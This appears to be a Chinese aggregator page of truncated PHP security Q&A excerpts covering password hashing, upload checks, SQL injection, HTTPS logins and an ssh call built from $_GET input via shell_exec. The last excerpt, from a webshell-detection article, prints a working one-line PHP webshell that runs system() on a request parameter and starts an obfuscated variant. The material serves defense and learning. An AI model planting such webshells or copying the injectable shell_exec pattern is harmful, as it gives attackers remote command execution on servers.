我已经实现了安全浏览API.我有被宣布为网络钓鱼域的域.我已经测试了它们,并且得到的响应为空数组. 我的问题是,谷歌安全浏览API是否已不再具有PHISHING类型?我已经获取了安全的浏览列表,但只找到了以下类型: 恶意软件,UNWANTED_SOFTWARE,社会工程学,POTENCIALLY_HARMFUL_APPLICATION 现在,我很担心,因为我无法在网络钓鱼类型上测试我的域. 有谁知道这件事吗?解决方法:Social engineering是人们以前所说的网络钓鱼的新术语. 通过网...
我现在在网上搜索并寻求帮助后,正在创建一个sha2登录表单,我发现下面的链接中的示例代码非常有用且实用(我希望我是对的!?),这是我唯一不了解的内容是程序员编写函数并从函数中获取盐值的方式. http://hungred.com/useful-information/php-better-hashing-password/define('SALT_LENGTH', 15);function HashMe($phrase, &$salt = null) {$pepper = '!@#$%^&*()_+=-{}][;";/?<>.,';if ($salt == ''){$salt = substr(hash('sha512',...
我正在构建一个登录系统,我想确保我正在编写写代码以在db中生成和存储密码. $options [‘passwd’]是用户选择作为密码的字符串. 这是我生成哈希的代码:public function createPasswd($options) {$hash_seed = 'm9238asdasdasdad31d2131231231230132k32ka?2da12sm2382329';$password = $options['passwd'];$date = new DateTime();$timestamp = $date->getTimestamp();$rand_number = rand($timestamp,$timestamp + pow(912391939...
我收到视频上传和图片上传: 我的环境:LAMP 编辑:我将允许远程上传和POST视频上传 EDIT2:我得到的文件将被重命名,我不会存储原始文件名. >首先我用$_FILES检查mime类型.>其次我再次使用finfo_file(如果函数存在)检查mimetype(PHP 5.3)或shell命令文件.>如果文件通过了上述检查,则文件将被移动到公共目录. 我的问题是这个设置安全吗?或者我能改进一下吗?我昨天读了这个洞,这对我来说似乎足够了,但谁知道:) 编码和安全时我是新手...
我正在使用ADOdb连接到我的MSSQL数据库.我想知道这是否足以阻止SQL注入? 我正在使用的准备好的查询是:$db = ADONewConnection('odbc_mssql');$dsn = "Driver={SQL Server};Server=SERVNAME;Database=DBNAME;";$ADODB_COUNTRECS = false;$db->Connect($dsn,'LOGIN','PASS');$sql = 'SELECT login, etc FROM users WHERE login ='.$db->Param('0').' AND pass ='.$db->Param('1').'';$stmt = $db->Prepare($sql); $stmt = $db->Ex...
我有一个隐藏在每个页面上的登录表单,并在需要时显示自己onClick而不是设置新的页面请求. 我注意到,为了使登录真正安全,表单操作应该指向https页面,但登录表单本身应该在https页面上. 有没有办法让弹出式登录表单安全无需整个网站https?解决方法:在http://页面上使用(理论上)https://的AJAX弹出窗口(或iframe)会出现两个问题: >攻击者可以拦截该页面并用自己的链接替换该链接.>这可以防止用户检查它所连接的站点. 第一个问题与...
用专门的会话对象覆盖超全局$_SESSION是否安全?class SessionObject implements ArrayAccess { ... }...// Session data has just been deserialised from store. $_SESSION = new SessionObject( $session_data );...// Using session object... $_SESSION['key'] = 27; $x = $_SESSION->get_data('key2', 'default-value');解决方法:虽然这可行,但我不认为这是明智的行为.在我看来,最少意外的原则适用于编程和用户界面设计.如果...
我是php的新手,我可以做一个简单的登录页面,例如创建表单,提交表单,处理和在php页面中进行身份验证等等. 我在互联网上的某个地方读过,看到像银行,谷歌和雅虎这样的大公司,他们的登录表单是“https”而不是“http”.所以我试试google什么是“https”的东西.好吧,我不能说我完全理解那是什么,但我想我知道这个概念,即创建一个更安全的登录页面. 我相信php可以做到(因为我看到使用https的wordpress,而wp正在使用php).有没有教程,或者你...
一、SQL注入攻击(SQL Injection) 攻击者把SQL命令插入到Web表单的输入域或页面请求的字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击。常见的SQL注入式攻击过程类如:1.某个Web应用有一个登录页面,这个登录页面控制着用户是否有权访问应用,它要求用户输入一个名称和密码;2.登录页面中输入的内容将直接用...
我只是编写一个PHP文件连接到我的SQL服务器以获取网站登录系统,我很害怕我只是要留下大量的安全漏洞. 我将我的connect.php文件放在网站根目录的目录中,其中包含:$db = new mysqli('localhost', 'publicguest', '**********', 'website');密码打开的地方.我知道当有人在浏览网站时,他们无法通过源代码看到PHP代码,但这是不安全的,避免这种情况的常用方法是什么?解决方法:如果您的服务器有配置问题,特别是PHP脚本没有执行,那么有人...
让我们假设我们有一个简单的PHP脚本应该从$_GET数组中获取ssh_host,ssh_username,ssh_port并尝试使用此参数连接到SSH.$port = escapeshellcmd($_GET['ssh_port']); $host = escapeshellcmd($_GET['ssh_host']); $username = escapeshellcmd($_GET['ssh_username']);$answer = shell_exec("ssh -p " . $port . " " . $user . "@" . $host);是escapeshellcmd()还是我需要更棘手的东西?或者也许我应该在这个例子中使用esc...
PHP安全之webshell和后门检测 一、各种webshell 一句话木马,其形式如下所示:<?php if(isset($_REQUEST['cmd'])){ ????$cmd = ($_REQUEST["cmd"]); ????system($cmd); ????echo?"</pre>$cmd<pre>"; ????die; } ?>这种容易被安全软件检测出来。为了增强隐蔽性,出现了各种一句话木马的变形,通过各种函数来伪装,这里不得不吐槽PHP弱类型对于安全来说是致命的 a、使用str_replace函数<?php $a =str_replace(x,"","axsxxsxexrxxt");...